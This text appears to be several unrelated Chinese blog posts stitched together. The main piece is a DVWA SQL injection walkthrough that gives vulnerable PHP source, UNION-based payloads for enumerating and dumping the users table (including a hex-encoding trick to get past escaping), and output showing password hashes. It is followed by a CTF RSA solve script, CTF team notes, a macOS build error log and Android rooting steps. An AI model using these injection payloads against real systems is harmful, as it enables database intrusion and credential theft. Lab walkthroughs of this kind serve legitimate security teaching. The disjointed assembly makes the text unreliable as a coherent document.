Low 题目源码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // 没有过滤就直接带入 SQL 语句中 使用单引号闭合 // !!! 漏洞点 !!! // 没有对 $id 进行任何过滤或转义，就直接拼接到 SQL 查询语句中 // 这使得攻击者可以通过构造恶意的 $id 值来执行 SQL 注入攻击 // 攻击者可以利用单引号 (') 来闭合 SQL 语句中的单引号，然后注入恶意的 SQL 代码 // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // Get results // 使用 mysqli_fetch_assoc 函数从结果集中获取一行数据，并将其作为关联数组返回 while( $row = mysqli_fetch_assoc( $result ) ) { // 回显信息 // Get values // 从关联数组中获取 'first_name' 和 'last_name' 的值 $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user // 向用户显示查询结果 // 使用 <pre> 标签可以保留 HTML 代码中的空格和换行符，使输出更易于阅读。 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } // 关闭数据库连接 mysqli_close($GLOBALS["___mysqli_ston"]); } ?> 思路 1. 判断字段数 - 使用 order by 语句 1' or 1=1 order by 1 # 临界报错即可判断字段数 (临界 - 1) 2. 确定显示的字段顺序 会进行多个查询 UNION 用于将两个或多个SELECT语句的结果合并为一个结果集 要使用UNION, 两个SELECT语句必须具有相同的列数, 而且列的数据类型必须兼容 UNION操作会将两个结果集的列对齐, 对应的位置会被映射到相同的字段上 1' union select 1,2 # $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,2 #'; 3. 获取数据库名 1' union select 1,database() # 回显信息 ID: 1' union select 1,database() # First name: admin Surname: admin ID: 1' union select 1,database() # First name: 1 Surname: dvwa 4. 获取数据库中的表 1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database() # 回显信息 ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # First name: admin Surname: admin ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # First name: 1 Surname: users,guestbook 5. 获取字段名 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # First name: admin Surname: admin ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # First name: 1 Surname: user_id,first_name,last_name,user,password,avatar,last_login,failed_login 6. 获取字段内容 其一 1' union select 1,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,user,0x3a,password,0x3a,avatar,0x3a,last_login,0x3a,failed_login) from users # 使用UNION操作 把两个SELECT语句的结果合并 第一个SELECT只是一个简单的1 而第二个SELECT使用了GROUP_CONCAT函数 将多个字段的值用冒号分隔 拼接成一个字符串, 回显的结果显示, 所有用户的信息都被拼接在一起 包括user_id、first_name、last_name等等 每个字段之间用冒号分隔, 多个用户之间用逗号分隔 GROUP_CONCAT 字符串拼接 前面的 1 用于匹配列数, 确保查询顺利执行 In [2]: chr(0x3a) Out[2]: ':' 回显 ID: 1' union select 1,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,user,0x3a,password,0x3a,avatar,0x3a,last_login,0x3a,failed_login) from users # First name: admin Surname: admin ID: 1' union select 1,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,user,0x3a,password,0x3a,avatar,0x3a,last_login,0x3a,failed_login) from users # First name: 1 Surname: 1:admin:admin:admin:5f4dcc3b5aa765d61d8327deb882cf99:/hackable/users/admin.jpg:2025-02-20 11:55:33:0,2:Gordon:Brown:gordonb:e99a18c428cb38d5f260853678922e03:/hackable/users/gordonb.jpg:2025-02-20 11:55:33:0,3:Hack:Me:1337:8d3533d75ae2c3966d7e0d4fcc69216b:/hackable/users/1337.jpg:2025-02-20 11:55:33:0,4:Pablo:Picasso:pablo:0d107d09f5bbe40cade3de5c71e9e9b7:/hackable/users/pablo.jpg:2025-02-20 11:55:33:0,5:Bob:Smith:smithy:5f4dcc3b5aa765d61d8327deb882cf99:/hackable/users/smithy.jpg:2025-02-20 11:55:33:0 其二 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # 回显 ID: 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # First name: admin Surname: admin ID: 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # First name: Gordon Surname: Brown ID: 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # First name: Hack Surname: Me ID: 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # First name: Pablo Surname: Picasso ID: 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # First name: Bob Surname: Smith ID: 1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99 Mid 题目源码 <?php // 检查是否通过 POST 请求提交了名为 'Submit' 的参数。 if( isset( $_POST[ 'Submit' ] ) ) { // 获取名为 'id' 的 POST 请求参数的值。 $id = $_POST[ 'id' ]; // 使用 mysqli_real_escape_string 函数对 $id 进行转义。 // mysqli_real_escape_string 函数用于转义字符串中的特殊字符， // 例如单引号 (')、双引号 (")、反斜杠 (\) 和 NULL 字符。 // 这可以防止 SQL 注入攻击。 // $GLOBALS["___mysqli_ston"] 是数据库连接资源。 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); // 构建 SQL 查询语句，从名为 'users' 的表中选择 'first_name' 和 'last_name' 列， // 条件是 'user_id' 等于转义后的 $id 值。 // !!! 注意 !!! 虽然使用了 mysqli_real_escape_string，但仍然存在整数型 SQL 注入的风险。 // 如果 $id 期望的是一个整数，并且没有进行类型检查，攻击者可以输入类似 "1 OR 1=1" 的值， // 从而绕过 user_id 的限制，获取所有用户的信息。 $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; // 使用 mysqli_query 函数执行 SQL 查询。 // $GLOBALS["___mysqli_ston"] 是数据库连接资源。 // 如果查询失败，则使用 die 函数输出错误信息。 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); // 获取查询结果 // 使用 mysqli_fetch_assoc 函数从结果集中获取一行数据，并将其作为关联数组返回。 // 循环遍历结果集中的每一行。 while( $row = mysqli_fetch_assoc( $result ) ) { // 从关联数组中获取 'first_name' 和 'last_name' 的值。 $first = $row["first_name"]; $last = $row["last_name"]; // 向用户显示查询结果。 // 使用 <pre> 标签可以保留 HTML 代码中的空格和换行符，使输出更易于阅读。 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } // 这段代码在 index.php 页面中稍后会被使用 // 在这里设置是为了像其他脚本一样，可以在这里关闭数据库连接 // 构建 SQL 查询语句，从名为 'users' 的表中选择所有行的数量。 $query = "SELECT COUNT(*) FROM users;"; // 使用 mysqli_query 函数执行 SQL 查询。 // $GLOBALS["___mysqli_ston"] 是数据库连接资源。 // 如果查询失败，则使用 die 函数输出错误信息。 $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); // 使用 mysqli_fetch_row 函数从结果集中获取一行数据，并将其作为索引数组返回。 // 获取索引为 0 的元素，该元素包含用户数量。 $number_of_rows = mysqli_fetch_row( $result )[0]; // 关闭数据库连接。 mysqli_close($GLOBALS["___mysqli_ston"]); ?> 思路 虽然前端使用了下拉选择菜单，但我们依然可以通过抓包改参数，提交恶意构造的查询参数 1 判断注入类型 这里我们其实可以直接做出判断 审计代码发现mysqli_real_escape_string()函数的存在 那么字符型注入肯定会遇到问题 我们直接进行数字型注入 因为前端使用下拉菜单，所以我们得通过抓包修改参数。 2. 猜测字段数 确定回显字段顺序 获取当前数据库 获取数据库中的表 这四部分操作与Low级别差别不大 这里只附上相关语句 1 order by 3 # 1 union select 1,2 # 1 union select 1,database() # 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # 3. 获取表中字段名 1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # 4. 我们按照原来的思路构建了语句，但是发生了错误，是因为单引号被转义，所以我们利用十六进制绕过 1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # 如果用 Yakit 的动态渲染, 需要给生成的内容前加上 `0x` 5. 获取数据 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users # final id=-1 union select 1,(SELECT GROUP_CONCAT(user,password SEPARATOR 0x3c62723e) FROM users)&Submit=Submit 也可以使用 python 完成第 4 步

With 正规子群 (Triode, adwa, Ov3) Crypto RSAabc 题目 Cryptonite-MIT/niteCTF-2024 / Solution from Crypto.Util.number import * from output import ns, cts c = "mrgπeτfΟΔςoΝeηiδyegsλexlwVαehιΠπμZe" def reverse_alphabet(char): if char == "e": return "_" elif char in string.ascii_uppercase: return chr(155 - ord(char)) elif char in string.ascii_lowercase: return chr(219 - ord(char)) else: return "?" def fac(n): for p in range(2, 2**26): if n % p == 0: q = n // p break return p, q def googly(number, position): mask = 1 << position return number ^ mask def RSA_de(c, e, p, q): d = inverse(e, (p - 1) * (q - 1)) return long_to_bytes(pow(c, d, p * q)) e = 65537 t = "" for i in c: t += reverse_alphabet(i) print(t) message = "" for i in range(len(t)): if t[i] == "?": p, q = fac(ns[i]) ct = cts[i] for j in range(ct.bit_length()): m = RSA_de(googly(ct, j), e, p, q) if len(m) == 1: message += m.decode() else: message += t[i] print(message) R Stands Alone 加密代码：

yafu 大数分解 / https://github.com/bbuhrow/yafu/issues/12 / yafu 调用了其作者自己写的 ytools.h, 这个库有很多 Linux/Windows platform 基础工具的宏实现, 无法运行在 macOS 上, 于是暂且搁置, 需要用就 docker run / docker run -it ssst0n3/yafu:2.10 其实有 ARM 的非官方实现: https://github.com/keens312/yafu_arm

起因 正规子群的群友发了一道二分, 如下, 让转为 SageMath Code / import math from gmpy2 import next_prime, sin, cos, mpz left = 2**63 right = 2**64 n = mpz( 13226258685595630160447827442153267599814292160977306459359416297020102688049793771120158029953432640539514974565723831126909317859357612109049397896863392224521508922404189962829783829182814282953169 ) while left <= right: k = (left + right) // 2 p = ( 2023 * k**5 + 2022 * k**4 - 2023 * k**3 - 2021 * k**2 + 2020 * k + 2019 + int(k**3 * sin(k + 2023)) - int(k**3 * cos(k**2 - 2023)) + int(math.e ** (23) * k) ) q = ( 2023 * k**5 - 2022 * k**4 + 2023 * k**3 - 2021 * k**2 + 2020 * k - 2019 - int(k**2 * sin(k * 2023)) + int(k**2 * cos(k**2 * 2023)) + int(math.e ** (23) * k**2) ) p = next_prime(p) q = next_prime(q) if p * q < n: left = k + 1 elif p * q > n: right = k - 1 else: # time < 0.1s print("k =", k) # k = 17821511070084697841 break 简单替换导入函数后发现并不符合预期

Crypto rasnd Part1 关键代码为 / x1=randint(0,2**11) y1=randint(0,2**114) x2=randint(0,2**11) y2=randint(0,2**514) hint1=x1*p+y1*q-0x114 hint2=x2*p+y2*q-0x514 首先给等式两边加上没有意义的恶臭数字 / 变为以下两个线性方程: / [公式] 其中: / $p$ 和 $q$ 是待求的素数. $x_1, x_2$ 是随机整数, 范围在 $[0, 2^{11}]$. $y_1, y_2$ 是随机整数, 范围分别在 $[0, 2^{114}]$ 和 $[0, 2^{514}]$. $h_1$ 和 $h_2$ 是已知的提示值. 目标是根据已知的 $h_1$ 和 $h_2$, 求解出素数 $p$ 和 $q$.

2024 11 正规子群第一次比赛就夺得金融密码杯挑战赛道二等奖 / 在那期间，鹏程杯无人上线导致约等于爆0 / 2024 12 niteCTF 2024 明明是一只密码小队，却由三极管拿下 niteCTF 2024 misc4 三血，有🍞的身影 / Solves Challenge Category Value Time Quadrillion Matrices Cryptography 334 December 14th, 8:57:06 PM La Casa de Papel Cryptography 50 December 14th, 3:48:47 PM Mumbo Dumbo Artificial Intelligence 50 December 14th, 2:12:03 AM und3rC0VEr Miscellaneous 264 December 14th, 1:49:22 AM R Stands Alone Cryptography 77 December 14th, 12:45:39 AM RSAabc Cryptography 50 December 13th, 11:27:56 PM Warmup Miscellaneous 10 December 13th, 11:05:37 PM 同时还有一位 AK 了密码的歪果仁, 在比赛后也加入了我们~

事发 OS: macOS 14.7 / 在 sage 之外编译 flatter / brew install cmake mpfr libomp gmp fplll 接着 mkdir build && cd build && cmake .. / 错误记录(macOS) user@host ~/D/C/t/flatter> mkdir build && cd build main user@host ~/D/C/t/f/build> cmake -DCMAKE_CXX_FLAGS="-Wno-overloaded-virtual" .. main -- The CXX compiler identification is Clang 19.1.5 -- Detecting CXX compiler ABI info -- Detecting CXX compiler ABI info - done -- Check for working CXX compiler: /opt/homebrew/opt/llvm/bin/clang++ - skipped -- Detecting CXX compile features -- Detecting CXX compile features - done -- Found OpenMP_CXX: -fopenmp=libomp (found version "5.1") -- Found OpenMP: TRUE (found version "5.1") -- Found GMP: /opt/homebrew/include -- Looking for sgemm_ -- Looking for sgemm_ - not found -- Performing Test CMAKE_HAVE_LIBC_PTHREAD -- Performing Test CMAKE_HAVE_LIBC_PTHREAD - Success -- Found Threads: TRUE -- Looking for dgemm_ -- Looking for dgemm_ - found -- Found BLAS: /Library/Developer/CommandLineTools/SDKs/MacOSX15.0.sdk/System/Library/Frameworks/Accelerate.framework -- Looking for cheev_ -- Looking for cheev_ - found -- Found LAPACK: /Library/Developer/CommandLineTools/SDKs/MacOSX15.0.sdk/System/Library/Frameworks/Accelerate.framework;-lm;-ldl -- Found MPFR: /opt/homebrew/include (Required is at least version "1.0.0") -- Found FPLLL: /opt/homebrew/include (found suitable version "5.5.0", minimum required is "5.1.0") -- Configuring done (2.1s) -- Generating done (0.0s) -- Build files have been written to: /Users/user/Documents/Code/tools/flatter/build user@host ~/D/C/t/f/build> make main? [ 1%] Building CXX object src/CMakeFiles/flatter.dir/math/matrix_tools.cpp.o [ 2%] Building CXX object src/CMakeFiles/flatter.dir/math/mpfr_blas.cpp.o [ 3%] Building CXX object src/CMakeFiles/flatter.dir/math/mpfr_lapack.cpp.o [ 5%] Building CXX object src/CMakeFiles/flatter.dir/problems/problem.cpp.o [ 6%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/fused_qr_size_reduction.cpp.o [ 7%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/base.cpp.o [ 9%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/columnwise.cpp.o [ 10%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/columnwise_double.cpp.o [ 11%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/iterated.cpp.o [ 12%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/lazy_refine.cpp.o [ 14%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/params.cpp.o [ 15%] Building CXX object src/CMakeFiles/flatter.dir/problems/fused_qr_sizered/seysen_refine.cpp.o [ 16%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/matrix_multiplication.cpp.o [ 18%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/base.cpp.o [ 19%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/aliased.cpp.o [ 20%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/elementary_mpfr.cpp.o [ 22%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/elementary_mpz.cpp.o [ 23%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/elementary_native.cpp.o [ 24%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/elementary_RRZ.cpp.o [ 25%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/elementary_RRl.cpp.o [ 27%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/elementary_ZZl.cpp.o [ 28%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/strassen.cpp.o [ 29%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/threaded.cpp.o [ 31%] Building CXX object src/CMakeFiles/flatter.dir/problems/matrix_multiplication/tri_matmul.cpp.o [ 32%] Building CXX object src/CMakeFiles/flatter.dir/problems/qr_factorization/base.cpp.o [ 33%] Building CXX object src/CMakeFiles/flatter.dir/problems/qr_factorization/blocked.cpp.o [ 35%] Building CXX object src/CMakeFiles/flatter.dir/problems/qr_factorization/householder_mpfr.cpp.o [ 36%] Building CXX object src/CMakeFiles/flatter.dir/problems/qr_factorization/eigen_impl.cpp.o [ 37%] Building CXX object src/CMakeFiles/flatter.dir/problems/qr_factorization/qr_factorization.cpp.o [ 38%] Building CXX object src/CMakeFiles/flatter.dir/problems/qr_factorization/threaded.cpp.o [ 40%] Building CXX object src/CMakeFiles/flatter.dir/problems/lattice_reduction/base.cpp.o [ 41%] Building CXX object src/CMakeFiles/flatter.dir/problems/lattice_reduction/fplll_impl.cpp.o In file included from /Users/user/Documents/Code/tools/flatter/src/problems/lattice_reduction/fplll_impl.cpp:1: In file included from /Users/user/Documents/Code/tools/flatter/src/problems/lattice_reduction/fplll_impl.h:3: In file included from /opt/homebrew/include/fplll/fplll.h:25: In file included from /opt/homebrew/include/fplll/bkz.h:21: In file included from /opt/homebrew/include/fplll/bkz_param.h:24: In file included from /opt/homebrew/include/fplll/pruner/pruner.h:21: In file included from /opt/homebrew/include/fplll/pruner/../lll.h:21: /opt/homebrew/include/fplll/pruner/../gso.h:221:16: error: 'fplll::MatGSO<fplll::Z_NR<>, fplll::FP_NR<>>::babai' hides overloaded virtual functions [-Werror,-Woverloaded-virtual] 221 | void virtual babai(vector<ZT> &v, int start = 0, int dimension = -1, bool gso = false); | ^ /Users/user/Documents/Code/tools/flatter/src/problems/lattice_reduction/fplll_impl.cpp:144:65: note: in instantiation of template class 'fplll::MatGSO<fplll::Z_NR<>, fplll::FP_NR<>>' requested here 144 | fplll::MatGSO<fplll::Z_NR<mpz_t>, fplll::FP_NR<mpfr_t>> m_gso(this->A, fplll_U, u_inv, gso_flags); | ^ /opt/homebrew/include/fplll/pruner/../gso_interface.h:469:16: note: hidden overloaded virtual function 'fplll::MatGSOInterface<fplll::Z_NR<>, fplll::FP_NR<>>::babai' declared here: different number of parameters (3 vs 4) 469 | void virtual babai(vector<ZT> &v, int start = 0, int dimension = -1); | ^ /opt/homebrew/include/fplll/pruner/../gso_interface.h:480:16: note: hidden overloaded virtual function 'fplll::MatGSOInterface<fplll::Z_NR<>, fplll::FP_NR<>>::babai' declared here: type mismatch at 2nd parameter ('const vector<FP_NR<__mpfr_struct[1]>> &' vs 'int') 480 | void virtual babai(vector<ZT> &w, const vector<FT> &v, int start = 0, int dimension = 1); | ^ In file included from /Users/user/Documents/Code/tools/flatter/src/problems/lattice_reduction/fplll_impl.cpp:1: In file included from /Users/user/Documents/Code/tools/flatter/src/problems/lattice_reduction/fplll_impl.h:3: In file included from /opt/homebrew/include/fplll/fplll.h:25: In file included from /opt/homebrew/include/fplll/bkz.h:21: In file included from /opt/homebrew/include/fplll/bkz_param.h:24: In file included from /opt/homebrew/include/fplll/pruner/pruner.h:21: In file included from /opt/homebrew/include/fplll/pruner/../lll.h:21: /opt/homebrew/include/fplll/pruner/../gso.h:233:16: error: 'fplll::MatGSO<fplll::Z_NR<>, fplll::FP_NR<>>::babai' hides overloaded virtual functions [-Werror,-Woverloaded-virtual] 233 | void virtual babai(vector<ZT> &w, const vector<FT> &v, int start = 0, int dimension = -1, | ^ /opt/homebrew/include/fplll/pruner/../gso_interface.h:469:16: note: hidden overloaded virtual function 'fplll::MatGSOInterface<fplll::Z_NR<>, fplll::FP_NR<>>::babai' declared here: different number of parameters (3 vs 5) 469 | void virtual babai(vector<ZT> &v, int start = 0, int dimension = -1); | ^ /opt/homebrew/include/fplll/pruner/../gso_interface.h:480:16: note: hidden overloaded virtual function 'fplll::MatGSOInterface<fplll::Z_NR<>, fplll::FP_NR<>>::babai' declared here: different number of parameters (4 vs 5) 480 | void virtual babai(vector<ZT> &w, const vector<FT> &v, int start = 0, int dimension = 1); | ^ 2 errors generated. make[2]: *** [src/CMakeFiles/flatter.dir/build.make:513: src/CMakeFiles/flatter.dir/problems/lattice_reduction/fplll_impl.cpp.o] Error 1 make[1]: *** [CMakeFiles/Makefile2:373: src/CMakeFiles/flatter.dir/all] Error 2 make: *** [Makefile:136: all] Error 2 user@host ~/D/C/t/f/build> 2 main? 解决方案 询问 CPP 大师: M1saka

WriteUp是假的，也许过几天会更新，咕咕咕，报差旅就是用来旅游和面基的

Flash back to the original boot.img of the flash package / Enable adb sideload under TWRP’s advanced options / adb sideload kernel.zip flash Kernel SU / Reboot to system / install Kernel-SU-maneger.apk / Grant file manager permissions in KernelSU Manager / Switch to /data/adb/modules (Time sorting) / Delete folders on demand (Optional backup) / Open magisk, patch the original boot.img, and restart to bootloader. / Example: / fastboot flash boot magisk_patched-27001_1OnaR.img fastboot reboot / resurrection!